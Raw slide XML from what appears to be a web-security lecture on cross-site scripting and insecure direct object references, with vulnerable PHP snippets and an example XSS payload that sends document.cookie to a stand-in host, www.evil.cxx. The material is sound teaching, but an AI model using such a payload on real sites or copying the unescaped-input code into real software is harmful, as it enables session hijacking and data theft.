              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites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18</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3664615103"/>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Extreme</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="FF00FF"/>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TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4495800"/>
            <a:ext cx="5715000" cy="6858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00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>$comment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>$_REQUEST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;div class='comment'&gt;$comment&lt;/div&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangular Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="685800"/>
            <a:ext cx="5943600" cy="2667000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -42934"/>
              <a:gd name="adj2" fmla="val 9900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What if the comment submitted is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="230188"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>= 'http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>www.evil.cxx/cgi-bin/cookie.cgi ?q='+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Now any user who sees the comment can have their session hijacked.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="436009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scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites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19</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954563439"/>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Extreme</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="FF00FF"/>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TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4495800"/>
            <a:ext cx="5715000" cy="6858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00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>$comment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>$_REQUEST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;div class='comment'&gt;$comment&lt;/div&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangular Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="685800"/>
            <a:ext cx="5943600" cy="2667000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -42934"/>
              <a:gd name="adj2" fmla="val 9900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What if the comment submitted is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="230188"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>= 'http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>www.evil.cxx/cgi-bin/cookie.cgi ?q='+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Now any user who sees the comment can have their session hijacked.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangular Callout 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3778742" y="2590800"/>
            <a:ext cx="3810000" cy="1333500"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -42934"/>
              <a:gd name="adj2" fmla="val 9900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Reflection-style attacks are easy and incredibly common.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="284202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This week’s expected outcomes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This week’s topics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This week’s homework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Upcoming deadlines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Question &amp; answer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{35F047CB-F391-4DAB-9FB4-A73A580B607B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39906905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Insecure direct object references</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.</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20</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265589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Insecure direct object references</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.</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21</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455944888"/>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C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1398114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Insecure direct object references</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.</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22</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20539139"/>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C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TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1600200"/>
            <a:ext cx="7906327" cy="4572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00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>http://www.bank.com/viewBalance?account=1234</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2286000"/>
            <a:ext cx="7924800" cy="12954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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>viewBalance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    $acct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>$_REQUEST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    $query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>SELECT BALANCE FROM ACCOUNTS WHERE ID='$acct'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3227186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Insecure direct object references</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.</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23</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20539139"/>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C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TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1600200"/>
            <a:ext cx="7906327" cy="4572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00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>http://www.bank.com/viewBalance?account=1234</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2286000"/>
            <a:ext cx="7924800" cy="12954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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000C0"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>viewBalance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    $acct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>$_REQUEST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    $query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
